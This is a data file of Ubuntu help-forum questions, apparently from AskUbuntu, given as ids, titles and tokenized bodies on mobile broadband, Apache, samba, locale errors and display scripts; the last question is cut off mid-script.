454190	ussd fails due to missing interface org.freedesktop.modemmanager1.modem.modem3gpp.ussd in 14.04	after upgrade to 14.04 every time i use ussd i get a dbus-send error due to missing interface in the object path /org/freedesktop/modemmanager1/modem/0 dose any one know how i can add this missing interface root @ jativa : ~ # dbus-send -- system -- print-reply -- dest=org.freedesktop.modemmanager1 /org/freedesktop/modemmanager1/modem/0 org.freedesktop.modemmanager1.modem.modem3gpp.ussd.initiate string : *888 # error org.freedesktop.dbus.error.unknownmethod : no such interface 'org.freedesktop.modemmanager1.modem.modem3gpp.ussd ' on object at path /org/freedesktop/modemmanager1/modem/0
454191	how to change default x mouse cursor form black x to arrow ?	i 'm using x in ubuntu 12.04.2 server without any dm for safety purpose , and everything works well except the cursor shape . it 's a black x now and sudo dpkg-reconfigure does n't work due to no dm . how can i change default x to arrow or something normal ? well i find it myself , xsetroot -cursor_name left_ptr works . is there any solution else ? i have to set it each time when boot up .
454192	problem with connecting mobile broadband in ubuntu 14.04	when i plugged mobile broadband top right bar new mobile broadband option appears then immediately disappears then again appears then immediately disappears and so on ... if i click on new mobile broadband immediately then it gives error when applying settings because modem disconnect before i configure it . i have idea net-setter ( similar to mobile partner of huawei ) on ubuntu 14.04 i ca n't connect by using it because of above mentioned problem . ( unstable detection of mobile-broadband ) wired connection ( usb tethering from android ) is working fine . thus , how can i solve it ?
454196	ask how to install fcitx-mozc and configure the mozc input method in fcitx	hello guys any body know how to install and configure input method using fcitx in ubuntu 14.04 lts or 12.04 lts ? i 'm already try to install but not working , so i 'm unistall fcitx . i need specific tutorial to install fcitx-mozc and configure the mozc input method in fcitx thanks i mean how to make press super+space to english and if i press super+space again will back to fcitx-mozc again
454197	running kde in a gnome box	i have a dual boot computer running kubuntu and ubuntu gnome . /home is on a separate partition and is shared by both . this works excellently except that if i have to switch , i have to restart . is there any way to achieve this complete seapration of des with an ability to switch without a restart ? running one in a virtual box came to my mind . but i do not know if that can be done and how to do it . also , will it mean a significantly slower performance ?
454198	multiple timers using gnome clocks	how to run multiple countdown timers simultaneously in gnome using gnome clocks ? ? so , there is a timer running for 30m , another for 15m , etc .
454199	how to understand apt.log ?	first , a little context : i have a machine with ubuntu 13.10 64bit with unity , that i use for development . as such , i updated several packages manually , and even installed/compiled some from sources ( e.g . python3 - 3.4.0 ) . now , as i am trying to upgrade to 14.04 i get the error `` can not calculate the upgrade '' . from what i read online , this is a specific issue on each machine , no `` miracle solution exists '' . so i started reading /var/log/dist-upgrade/apt.log to see what packages are broken to try and fix them . the question is : how do i interpret the line ? broken python3-dbus : amd64 depends on python3 [ amd64 ] < 3.3.2-14ubuntu1 - > 3.4.0-0ubuntu2 > ( python ) ( < 3.4 ) does this mean i have 3.3.2.14 updated to 3.4.0 and it expects version less than ( < ) 3.4 ? or the other way around ? btw , i have reinstalled python3 , dpkg -l shows 3.3.2-14 , but python3 binary shows version 3.4.0 thanks .
454200	how to install vlc from the ubuntu software center	i have just started using ubuntu 13.10 . i am trying to download vlc media player from the ubuntu software center , but it shows only a more info button . it shows no download option . how do i install it ?
454202	how to install the iso file of ubuntu 14.04 into virtualbox in means of command line , which is installed in the linux server from windows using putty	this situation is somewhat complicated ! i use win7 os and i have to work on the linux server by the ssh client , putty . right now i have installed the virtualbox into the linux server in means of command line ( since i have to install the vb by putty , where there is no gui ) . then i have to install the iso file of ubuntu-14.04 into the vb in means of command line , too . in order to complete it , i downloaded the virtualbox_usermanual and executed the procedures as the manual says . however , when i enter the command as follows , the green focus just stayed there [ b50039 @ neptune ubuntu ] $ vboxheadless -- startvm ubuntu_14_04 oracle vm virtualbox headless interface 4.3.10 ( c ) 2008-2014 oracle corporation all rights reserved . vrde server is listening on port 5000 . [ green focus ] could anybody help me ? emergency！！！
454206	upload php script to var.www	i created a php file and would like to upload it to var/www folder to apache2 . i use eclipse and bluefish for uploading files . it looks like the program does not have root rights . i would like to know if there is any upload files program , or if the only way to upload files to the server is to use the terminal command sudo cp source destination ? any help is greatly appreciated
454207	start menu right-click `` properties '' option missing from program entries in lubuntu 14.04 ?	in lubuntu 13.10 , when you right-click on any start menu program entry , such as firefox or audacious , you have two options : `` add to desktop '' and `` properties '' . in lubuntu 14.04 , the `` properties '' option is missing . is there any way to get the `` properties '' option back in lubuntu 14.04 ? why was it removed ? or is my start menu configuration all messed up ? please advise if possible . thank you in advance for any assistance .
454208	problem with download multimedia plugin	when i try to play audio file then needs to install multimedia plugin , i also try to install multimedia plugin then it shows `` download fail- check your internet connection . my connection speed is good , and i 'm browsing web . but how to fix it ?
454209	apache server virtual hosts not working	so i have updated to ubuntu 14.04 lts from 12.04 . the problem is that my existing virtual hosts are not working after the upgrade . and yes i have tried sudo a2ensite test.dev but it says : error : site test.dev does not exist ! this is what i have in the /etc/apache2/sites-available directory test.dev mysite.dev anothersite.dev the content of test.dev is < virtualhost *:80 > serveradmin webmaster @ localhost servername test.dev serveralias www.test.dev documentroot /var/www/test < /virtualhost > and the hosts file 127.0.0.1 test.dev 127.0.0.1 www.test.dev
454212	allow user to run programs as root without password . would it be the correct solution to my problem ?	i have a server which i need to be running certain programs permanently ; i 'm having problems with two of them and i 'm not sure if the solution i 've found would be the correct one , so i ask for opinion to users with more experience on this issues . on one hand i have a cron-task-launched script which connects to an ftp to update the ip of the server so , in case the ip ( it 's a dynamic one ) changes , i can check the ftp to get the current ip so i can connect to the server . on the other hand , i have a wine-launched program which also needs to connect to another ftp account and execute from time to time other commands which need root privileges . what 's my problem ? if i login and launch these processes , they run perfectly for hours , even if i let the session `` go to the block-password-asking-screen '' , i guess it 's because they execute the processes which need root password quite often ( maybe every 2-10 minutes ) , but if they stop executing those processes , if for example , they do n't need to connect to the ftp for 5 or 10 hours , after that time they ca n't do it until i login again , and in that exact moment they are able again to connect to the ftp . so , after reading quite information about it , i guess the solution would be to edit /etc/sudoers and add a line similar to this one : user_x all=nopasswd : /home/user_x/script.sh so this user ( the processes running on it 's session ) be able to access ftp permanently . in fact , the wine-launched process , wo n't be able to connect again even if i login , so i guess wine needs it 's own permission , so maybe i should something different instead of that ? i 'm not sure about it to be the right solution . could anyone please confirm me it is ? thanks a lot in advance . edit : command used to edit cron tasks : sudo crontab -u root -e line i 've added to ( try to ) make it work : */30 * * * * /home/user_x/check_public_ip.sh > /home/user_x/desktop/cron_res.txt
454218	warning while running lammps-daily on ubuntu 12.04 lts	i get the following warning while running lammps-daily on ubuntu 12.04 lts : warning : omp_num_threads environment is not set . ( ../comm.cpp:100 ) using 1 openmp thread ( s ) per mpi task after this , the cursor starts blinking.. i have installed lammps-daily by using this link : http : //lammps.sandia.gov/download.html # ubuntu could somebody please help me how to come out of this.. many thanks . best regards , jvn sarma , india .
454219	installation of display card driver : [ ati radeon hd 4770 ]	how to install my display card driver ? previously , i did the following things : downloaded the official driver from amd.com : http : //support.amd.com/en-us/download/desktop/legacy ? product=legacy2 & os=linux % 20x86_64 now i have this : did this in a terminal : chmod +x amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64.run did this in the terminal : sh amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64.run i got this windows , chose the first option and then click `` continue '' : and this windwos : .log file : http : //paste.ubuntu.com/7320170/ now what can i do ? thank you for your attention -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- desktop information -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- os : ubuntu 14.04 lts ( 64 bits ) display card : msi r4770 cyclone ( ati radeon hd 4770 ) * cpu : amd athlon ii x4 620 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * `` no additional drivers available '' in `` additional driver '' page
454220	ubuntu 14.04 cheese booth not detect webcam	cheese booth shows an error : there was an error playing video from the webcam i test if webcam works fine or not by opening google hangout , its works fine . please tell , what is the issue in cheese booth . note : sometimes the cheese booth works fine but most of time not
454224	how to create a personalised iso image file of selected softwares ?	is there any customisation software which can help to create the personalised iso image of my selected software like synapse , development tools like eclipse , netbeans etc ? so that i do n't have to download them again and again which will save my lots of time .
454225	fails to auto-mount device & error mounting system managed device ( ubuntu 14.04 )	i used auto-mount option in ubuntu 14.04 for mounting my all drives at startup . all drives mounts automatically on startup except /dev/sda3 . ( let me clarify that /dev/sda3 is ext4 file-system and labeled ext4 ) . it gives error on startup and ask s for skip and m for manual mounting.i skipped and try to mount with disk ( installed app from dash earlier disk-utility ) , it gives error : but if i mount with command : sudo mount /dev/sda3 /media/pandya/ext4 at startup ( by pressing m for manual mount ) or after started up ( from terminal ) , then it mounts properly . gparted also mounts that drive on /media/pandya/ext4 successfully . i also checked /etc/fstab and entry for /dev/sda3 , which is proper /dev/sda3 /media/pandya/ext4 auto nosuid , nodev , nofail , x-gvfs-show 0 0 i used same auto-mount options for all drive . then why only one is not auto-mounting ?
454226	changing the disk to partition when wanting to dual boot install	i am trying to install 14.04 . the problem is quite simple : i get to the point where i must chose how much memory ubuntu should get . ( the drag how much you want menu ) the only drive i can chose from is c which is running terribly low on memory ( ~10gigs ) where as my d has over 500 free . the question is simple : how can i get the installer to let me chose d and not c ? edit : i am stuck on point 5 of the answer to this question how can i install ubuntu without removing windows ?
454227	e : unable to lock the administration directory ( /var/lib/dpkg/ ) , error	why do i get - e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? when trying to install any software through terminal ? and how to solve it ?
454233	huawei ec156 mobile broadband not working with network manager on ubuntu 14.04 lts 64 bit	related to getting huawei mobile broadband e173 to work in ubuntu 13.10 . i have the same situation with the huawei ec156 modem .with wvdial it works perfectly with /dev/ttyusb0 but with network manager for some reason it uses /dev/ttyusb2 and fails to connect ( even though it is detected by nw manager ) . may be it is as case of way the code/config is implemented . i would really like to use the network manager for easier connectivity and to use the data card as a wifi hotspot using network sharing . lsusb bus 002 device 006 : id 12d1:140b huawei technologies co. , ltd. ec1260 wireless data modem hsd usb card nmcli d device type state **ttyusb2 cdma disconnected** eth0 802-3-ethernet unavailable wlan0 802-11-wireless disconnected logs while pluggin in device apr 24 12:23:04 quaddy kernel : [ 3951.246348 ] usb 2-1.1 : new full-speed usb device number 8 using ehci-pci apr 24 12:23:05 quaddy kernel : [ 3951.340038 ] usb 2-1.1 : new usb device found , idvendor=12d1 , idproduct=1505 apr 24 12:23:05 quaddy kernel : [ 3951.340047 ] usb 2-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=4 apr 24 12:23:05 quaddy kernel : [ 3951.340052 ] usb 2-1.1 : product : huawei mobile apr 24 12:23:05 quaddy kernel : [ 3951.340057 ] usb 2-1.1 : manufacturer : huaÿwei technologies apr 24 12:23:05 quaddy kernel : [ 3951.340062 ] usb 2-1.1 : serialnumber : ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ apr 24 12:23:05 quaddy kernel : [ 3951.340747 ] usb-storage 2-1.1:1.0 : usb mass storage device detected apr 24 12:23:05 quaddy kernel : [ 3951.340976 ] scsi16 : usb-storage 2-1.1:1.0 apr 24 12:23:05 quaddy mtp-probe : checking bus 2 , device 8 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1 '' apr 24 12:23:05 quaddy mtp-probe : bus : 2 , device : 8 was not an mtp device apr 24 12:23:06 quaddy kernel : [ 3952.341150 ] scsi 16:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 0 apr 24 12:23:06 quaddy kernel : [ 3952.350107 ] sr1 : scsi-1 drive apr 24 12:23:06 quaddy kernel : [ 3952.350410 ] sr 16:0:0:0 : attached scsi cd-rom sr1 apr 24 12:23:06 quaddy kernel : [ 3952.350564 ] sr 16:0:0:0 : attached scsi generic sg2 type 5 apr 24 12:23:06 quaddy usb_modeswitch : switch device 12d1:1505 on 002/008 apr 24 12:23:06 quaddy kernel : [ 3952.665155 ] usb 2-1.1 : usb disconnect , device number 8 apr 24 12:23:09 quaddy kernel : [ 3955.689071 ] usb 2-1.1 : new full-speed usb device number 9 using ehci-pci apr 24 12:23:09 quaddy kernel : [ 3955.783434 ] usb 2-1.1 : new usb device found , idvendor=12d1 , idproduct=140b apr 24 12:23:09 quaddy kernel : [ 3955.783443 ] usb 2-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=4 apr 24 12:23:09 quaddy kernel : [ 3955.783448 ] usb 2-1.1 : product : huawei mobile apr 24 12:23:09 quaddy kernel : [ 3955.783453 ] usb 2-1.1 : manufacturer : huaÿwei technologies apr 24 12:23:09 quaddy kernel : [ 3955.783458 ] usb 2-1.1 : serialnumber : ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ apr 24 12:23:09 quaddy kernel : [ 3955.784391 ] usb-storage 2-1.1:1.0 : usb mass storage device detected apr 24 12:23:09 quaddy kernel : [ 3955.784608 ] option 2-1.1:1.0 : gsm modem ( 1-port ) converter detected apr 24 12:23:09 quaddy kernel : [ 3955.784925 ] usb 2-1.1 : gsm modem ( 1-port ) converter now attached to ttyusb0 apr 24 12:23:09 quaddy kernel : [ 3955.785385 ] usb-storage 2-1.1:1.1 : usb mass storage device detected apr 24 12:23:09 quaddy kernel : [ 3955.785691 ] option 2-1.1:1.1 : gsm modem ( 1-port ) converter detected apr 24 12:23:09 quaddy kernel : [ 3955.785943 ] usb 2-1.1 : gsm modem ( 1-port ) converter now attached to ttyusb1 apr 24 12:23:09 quaddy kernel : [ 3955.786271 ] usb-storage 2-1.1:1.2 : usb mass storage device detected apr 24 12:23:09 quaddy kernel : [ 3955.786561 ] option 2-1.1:1.2 : gsm modem ( 1-port ) converter detected apr 24 12:23:09 quaddy kernel : [ 3955.786822 ] usb 2-1.1 : gsm modem ( 1-port ) converter now attached to ttyusb2 apr 24 12:23:09 quaddy kernel : [ 3955.786933 ] usb-storage 2-1.1:1.3 : usb mass storage device detected apr 24 12:23:09 quaddy kernel : [ 3955.787542 ] scsi20 : usb-storage 2-1.1:1.3 apr 24 12:23:09 quaddy mtp-probe : checking bus 2 , device 9 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1 '' apr 24 12:23:09 quaddy mtp-probe : bus : 2 , device : 9 was not an mtp device apr 24 12:23:09 quaddy modemmanager [ 701 ] : < warn > ( ttyusb1 ) : port attributes not fully set apr 24 12:23:09 quaddy modemmanager [ 701 ] : < warn > ( ttyusb2 ) : port attributes not fully set apr 24 12:23:09 quaddy modemmanager [ 701 ] : < warn > ( ttyusb0 ) : port attributes not fully set apr 24 12:23:10 quaddy usb_modeswitch : switched to 12d1 : ffffffff on 002/008 apr 24 12:23:10 quaddy kernel : [ 3956.787823 ] scsi 20:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 0 apr 24 12:23:10 quaddy kernel : [ 3956.789660 ] scsi 20:0:0:1 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 apr 24 12:23:10 quaddy kernel : [ 3956.798813 ] sr1 : scsi-1 drive apr 24 12:23:10 quaddy kernel : [ 3956.799032 ] sr 20:0:0:0 : attached scsi cd-rom sr1 apr 24 12:23:10 quaddy kernel : [ 3956.799130 ] sr 20:0:0:0 : attached scsi generic sg2 type 5 apr 24 12:23:10 quaddy kernel : [ 3956.799427 ] sd 20:0:0:1 : attached scsi generic sg3 type 0 apr 24 12:23:10 quaddy kernel : [ 3956.835675 ] sd 20:0:0:1 : [ sdb ] attached scsi removable disk apr 24 12:23:11 quaddy usb_modeswitch [ 3860 ] : usb_modeswitch : switched to 12d1:140b on 2/9 apr 24 12:23:12 quaddy usb_modeswitch [ 3860 ] : usb_modeswitch : add device id 12d1:140b to driver option apr 24 12:23:12 quaddy usb_modeswitch [ 3860 ] : usb_modeswitch : please report the device id to the linux usb developers ! apr 24 12:23:13 quaddy modemmanager [ 701 ] : < warn > ( ttyusb1 ) : port attributes not fully set apr 24 12:23:13 quaddy modemmanager [ 701 ] : < warn > ( ttyusb2 ) : port attributes not fully set apr 24 12:23:23 quaddy modemmanager [ 701 ] : < info > creating modem with plugin 'huawei ' and '3 ' ports apr 24 12:23:23 quaddy modemmanager [ 701 ] : < warn > ( ttyusb2 ) : port attributes not fully set apr 24 12:23:23 quaddy modemmanager [ 701 ] : < info > modem for device at '/sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1 ' successfully created apr 24 12:23:23 quaddy modemmanager [ 701 ] : < warn > could n't load unlock retries : 'sim not inserted' apr 24 12:23:23 quaddy modemmanager [ 701 ] : < warn > could n't load list of own numbers : 'mdn from nv memory appears invalid' apr 24 12:23:23 quaddy modemmanager [ 701 ] : < warn > could n't load current bands : 'could n't build bands array from '3 '' apr 24 12:23:23 quaddy modemmanager [ 701 ] : < info > modem : state changed ( unknown - > disabled ) apr 24 12:23:23 quaddy networkmanager [ 897 ] : < warn > ( ttyusb2 ) : failed to look up interface index apr 24 12:23:23 quaddy networkmanager [ 897 ] : < info > ( ttyusb2 ) : new broadband device ( driver : 'option1 ' ifindex : 0 ) apr 24 12:23:23 quaddy networkmanager [ 897 ] : < info > ( ttyusb2 ) : exported as /org/freedesktop/networkmanager/devices/4 apr 24 12:23:23 quaddy networkmanager [ 897 ] : < info > ( ttyusb2 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] apr 24 12:23:23 quaddy networkmanager [ 897 ] : < info > ( ttyusb2 ) : deactivating device ( reason 'managed ' ) [ 2 ] apr 24 12:23:23 quaddy networkmanager [ 897 ] : < info > networkmanager state is now disconnected apr 24 12:23:23 quaddy networkmanager [ 897 ] : < info > ( ttyusb2 ) : device state change : unavailable - > disconnected ( reason 'none ' ) [ 20 30 0 ] this device has support for additional sim hence ttyusb2 & ttyusb0 is cdma i have tried the solution here configuring usb modem ( huawei ec156 ) in ubuntu 13.10 also . question is `` can i manually configure network manager to use ttyusb0 instead of ttyusb2 '' may be one work around would be to give some options to specify the correct modem and the at commands just like a normal dialer .
454235	i want to increase ubuntu allocation unit size to 40gb how can i do that ?	when i started to install ubuntu i had in mind that a 40 gb option would be there , but it wasnt so i installed with 30gb size but i need atleast 40 gb for what i am doing . anyway to increase the size of ubuntu ?
454237	audio clicks with vlc when playing apple mov video format	okay so i have this annoying little issue , not too much of a big deal really , but i ca n't get any audio out of apple quicktime mov video formats , instead i get clicking noises , i have ubuntu-extras installed and various other audio codecs such as gstreamer , but when played in vlc it just plays the video and instead of giving me the actual audio output encoded in the video it just gives me stuttering clicking noises . the video format was converted on a mac using handbrake , converted from m2ts format to mov format , which played perfectly fine on mac , but just not on linux in vlc for some reason . to verify this i had played in both quicktime and vlc on a mac before getting the real audio output . what can i do to get vlc on linux to play mov video formats with it 's real audio output ? are there any audio codec packages i may be missing that i need to install , if so which ones ?
454238	application icons in system settings disappear after deleting text entry	i used to install ibus pinyin in 12.04 following steps as belows : settings -- > language support -- > install/remove languages , check chinese item $ sudo apt-get install ibus ibus-clutter ibus-gtk ibus-gtk3 ibus-qt4 $ im-switch -s ibus restart $ sudo apt-get install ibus-pinyin $ ibus-setup it worked . but not in 14.04 , and i am facing several issues : command `` im-switch -s ibus '' did n't work , system claimed that i need to install im-switch , but that will make `` language support '' disappear . how to make ibus work ? text entry icon existed on task bar , i thought that 's because text entry affects ibus ; so i deleted text entry through ubuntu software center , that made most of default system application icons gone in system settings . am i able to get them back ?
454241	first time ubuntu user . 14.04 freezes	so , i work at a computer repair shop , and there we have a bunch of hard drives just lying about , so i decided to install linux to check it out . i googled how to install linux , and i ended up downloading the .iso for ubuntu amd64 . i used the unebootin thing to mount it on a usb , then booted off the usb , since i did n't have any cds handy . anyway , i installed ubuntu , and it seemed all fine and dandy , but when i moved the mouse a bit , the screen freezed . i kept restarting , and the same thing kept happening . also , i noticed there was n't a login screen anytime i started it . specs : the hard drive was a 160gb 2.5inch hitachi hdd prior to installing ubuntu , it had windows 7 home premium thank you .
454242	compile error when trying to run make	i have the following error when trying to run make command , /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../libcppunit.a when searching for -lcppunit /usr/bin/ld : skipping incompatible /usr/lib/libcppunit.a when searching for -lcppunit /usr/bin/ld : can not find -lcppunit collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ cppunit ] error 1 i have installed libcppunit-dev but the problem persists . i have looked for solutions but no results . any idea how to solve it ? 1 ) i am using ubuntu 12.10 64bits 2 ) i am running gcc 4.7.2 3 ) i am trying to compile a program made for a research group . i am sure that it is properly built .
454246	how do i complete download ?	i want to exchange my xp for kubuntu . however , i 'm not very well versed with computers . i downloaded kubuntu thinking it would automatically erase my windows xp and replace it . it took about 20 minutes to download but now i ca n't find it . i did a 'search '' and many iso files turned up , but none that i could recognise as kubuntu . what do i do now ? please make suggestions simple and in plain talk . thank you .
454248	letters , characters missing !	yesterday i was trying to install cairo dock and docky , after some hours removed them . now what happening is the whole ubuntu is not showing anything as before , like when i right click on desktop it shows some letters and nothing else , could not take its screen short . so i am providing the screenshot of firefox tab as below- the same thing is happening everywhere like askubuntu tool tips , everywhere .
454253	how to run android sdk in ubuntu 64-bits	i installed ubuntu 14.04 and the current android development sdk , which contains 32bit executables . i found that i can not run those 32bit binaries . trying to start them from bash gives me an error : thomas @ thinkpad $ ./adb bash : ./adb : no such file or directory it is there though : thomas @ thinkpad $ ls -al ./adb -rwxrwxrwx 1 thomas thomas 1231255 jan 17 13:31 ./adb thomas @ thinkpad $ file ./adb ./adb : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.8 , not stripped . same symptom for all the other 32bit tools in the android sdk . in olden days one could just install 32bit libraries on 64bit ubuntu to get 32bit support , but that does not seem to work anymore . how do i run 32bit apps on a 64bit ubuntu 14.04 ?
454255	laptop shutdown if unplugged power	i am using ubuntu 14.04 on my laptop and i 've found it will immediately shut down if power is unplugged , as if there was no battery . i do not have this problem when running windows 8 on the same laptop .
454256	enable external boot devices in uefi	i own an hp pavilion 5 notebook which came pre installed with windows 8 . i 'm trying to install ubuntu on my system via a liveusb . but my system does n't detect the liveusb during boot . my boot order is proper , with external usb in the first place , but the system just boots into windows directly . also i observed that when i turn on legacy mode , the usb is detected . but then i have to install ubuntu in csm mode instead of efi , which causes boot problems later on . is there a way to detect my external boot options in uefi as well ? p.s . secure boot was disabled during the booting . the tool used for creating the liveusb was yumi multiboot installer available at pendrivelinux.com .
454260	how to solve locale problem	i am facing a problem as asked in this question , i have tried the proposed solution but facing the same issue when i run locale , locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_us.utf-8 language=en_us.utf-8 lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all=en_us.utf-8 when i run sudo locale-gen en_us.utf-8 i get this error sudo : unable to resolve host ubuntu /bin/bash : warning : setlocale : lc_all : can not change locale ( en_us.utf-8 ) generating locales ... en_us.utf-8 ... /usr/sbin/locale-gen : line 177 : warning : setlocale : lc_all : can not change locale ( en_us.utf-8 ) /usr/sbin/locale-gen : line 243 : 8925 killed localedef $ no_archive -i $ input -c -f $ charset $ locale_alias $ locale failed generation complete . i am running ubuntu cloud image on openstack cloud
454262	kile on ubuntu 14.04	i installed ubuntu 14.04 and i really like kile to edit latex documents . i tried some other editors , but i really think kile is the best one by far . however , one thing in kile is very annoying . on my machine , any changes i make in settings , like checking `` dynamic word wrap '' or checking `` automatic spell checking '' , does not persist . in other words , these changes are applied while i have kile opened . after closing and opening kile again , all these changes are lost and i have to reconfigure kile . i googled about this issue , but could not find a solution . i changed the owner of the ~/.kde to my user and gave permission to anyone to read and write to ~/.kde/share/config/kilerc ( the file where kile stores his configurations ) . however , he always starts with his default config , like if it was the first run . i do n't know what to do more , any help would be appreciated . thanks in advance .
454263	how to set borders around windows	can someone advise me of how to add borders ( wide borders ) to windows in ubuntu version 14.04 . in the past i have used `` gnome-tweak-tool '' . however it does n't work with version 14.04 . all my windows ( especially the many terminal screens i work with ) appear to blend as one . it 's very hard to tell where one window begin and another end . also the title bars are very hard to distinguish between which window is active and with window is inactive . thanks in advance for anyone who has a solution of how to customize these windows ( or how to make gnome-tweak-tool work with ubuntu 14.04 ) . i tryed activating the window decorator feature of ccsm but using that disabled unity and made the environment unusable .
454268	lenovo thinkpad t440p + ubuntu 12.04/14.04	is there anybody , who is able to install ubuntu 12.04 or 14.04 ( 64bit ) on lenovo thinkpad t440p and get fully functional nvidia optimus ? this laptop model is certified by canonical to be fully supported by ubuntu , but install ubuntu 14.04 is nearly impossible , due to the fact , that 14.04 desktop iso image crash during initial boot . any help ? see , for exmaple : thinkpad t440p : problems with various ubuntu flavours add info regarding bad 12.04 support : t440p problems with 12.04
454269	after upgrading from 12.04 to 14.04 samba has big issues	the server has been running very stable with 12.04 lts for years but after upgrading to 14.04 lts a encountered huge samba issues . directly after upgrade the mapping from windows was toggling but there was a samba fix next day correcting this . it has run fine for weeks but after the last updates it does n't work at all . yesterday i even tried to remove and reinstall samba without success . have read the other threads but it doesnt help me . everything looks fine in webmin 1.680 . users and shares exists . i reentered the passwords but i can not map any network drive from windows anymore . system error 53 has occurred . the network path was not found . it is no dns issue . i get the same error when using ip-address . http , ssh and ping works fine with host name .
454274	ubuntu 14.04 extremely slow login after logout	i have just clean-installed ubuntu 14.04 + gnome 3.10 ( the system is 32 bits since my laptop is just a hp g72 with 3gb of ram ) . i 've also moved back some users data ( .thunderbird , some docs , music and photos ) . by the way : there are two users ( both admin - but my wife does n't fiddle with sudo for sure ) . everything seems to be fine if only we log in after reboot / start . it takes no longer than 10 secs from entering the password to desktop , which is fine for a laptop some years old . however , after having logged out ( same happens for both users ) it is extremely slow to log back again ( or login to the other account ) . i tried ( over and over again ) to measure the time , but useally after 3 minutes i just go to a console , login as the `` stuck '' user and `` kill -9 -1 '' . after that , login time is fine again . of couse until i log out ... can anyone help me with this one ?
454276	upgrade from 12.04 failing	i have a server built a few days ago with 12.04.4 lts . i am trying to upgrade it to the latest version . what am i doing wrong ? root @ ubuntu-server : ~ # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise root @ ubuntu-server : ~ # cat /etc/update-manager/release-upgrades | grep prompt prompt=normal root @ ubuntu-server : ~ # do-release-upgrade checking for a new ubuntu release no new release found thanks for your help ! -- hope this is not a duplicate .
454279	change default system font using terminal only in 14.04	the following question answers how to adjust fonts using tweak tool but the luddite in me would like to know how to do this without installing unity-tweak-tool . how can i adjust the default system font from a terminal .
454282	how to install windows 7 alongside ubuntu 14.04	i am currently using ubuntu 14.04 and i need to install windows 7 as dual boot ( not vm ) . how can i do that ? should i create a partition with g parted for win7 ? need advice from someone who did this successfully .
454286	could n't generate pgp key , general error	now i 'm using ubuntu12.04.04 lts . i tried to create my gpg key with following steps on `` passwords and keys '' program . i do n't know why this error was occurred . according to i skipped some steps .
454288	ubuntu - switch keyboard shortcat conflicts with another program	i recently upgraded to ubuntu 13.10 , with the new keyboard handling system . i changed keyboard switch to ctrl+shift , as i like . but after that , in other programs this shortcat stops working . e.x . ctrl+shift+left to select whole word , etc ... is there any way to fix this ?
454298	how can i bind a keybord shortcut on my thoinkpad x220 tablet ?	i have a fresh install of ubuntu trusty 14.04 on my lenovo thinkpad x220t ( or x220 tablet ) . i have set up two scripts to enhance the screen rotation , and i would like to bind them to a keyboard shortcut . basically , i added these lines on /etc/rc.local : setkeycodes 67 202 # launch3 setkeycodes 6c 149 # launch2 to bind the second and the third buttons on the edge of the screen to the `` lauch2 '' and `` launch3 '' buttons . then i try to add a custom shortcut to my scripts , but nothing happends . please note that if i link the scripts to a keyboard shortcut , like ctrl+alt+b , they work . the scripts are the following : # ! /bin/sh # find the line in `` xrandr -q -- verbose '' output that contains current screen orientation and `` strip '' out current orientation . rotation=`xrandr -q -- verbose | grep 'connected ' | egrep -o '\ ) ( normal|left|inverted|right ) \ ( ' | egrep -o ' ( normal|left|inverted|right ) '` # using current screen orientation proceed to rotate screen and input tools . echo $ rotation case `` $ rotation '' in normal ) # -rotate to inverted xrandr -o inverted xsetwacom set `` 10 '' rotate half xsetwacom set `` 11 '' rotate half xsetwacom set `` 15 '' rotate half ; ; right ) # -rotate to inverted xrandr -o inverted xsetwacom set `` 10 '' rotate half xsetwacom set `` 11 '' rotate half xsetwacom set `` 15 '' rotate half ; ; inverted ) # -rotate to normal xrandr -o normal xsetwacom set `` 10 '' rotate none xsetwacom set `` 11 '' rotate none xsetwacom set `` 15 '' rotate none ; ; esac exit 0 and # ! /bin/sh # find the line in `` xrandr -q -- verbose '' output that contains current screen orientation and `` strip '' out current orientation . rotation=`xrandr -q -- verbose | grep 'connected ' | egrep -o '\ ) ( normal|left|inverted|right ) \ ( ' | egrep -o ' ( normal|left|inverted|right ) '` # using current screen orientation proceed to rotate screen and input tools . echo $ rotation case `` $ rotation '' in normal ) # -rotate to the right xrandr -o right xsetwacom set `` 10 '' rotate ccw xsetwacom set `` 11 '' rotate ccw xsetwacom set `` 15 '' rotate ccw ; ; inverted ) # -rotate to the right xrandr -o right xsetwacom set `` 10 '' rotate ccw xsetwacom set `` 11 '' rotate ccw xsetwacom set `` 15 '' rotate ccw ; ; right ) # -rotate to normal xrandr -o normal xsetwacom set `` 10 '' 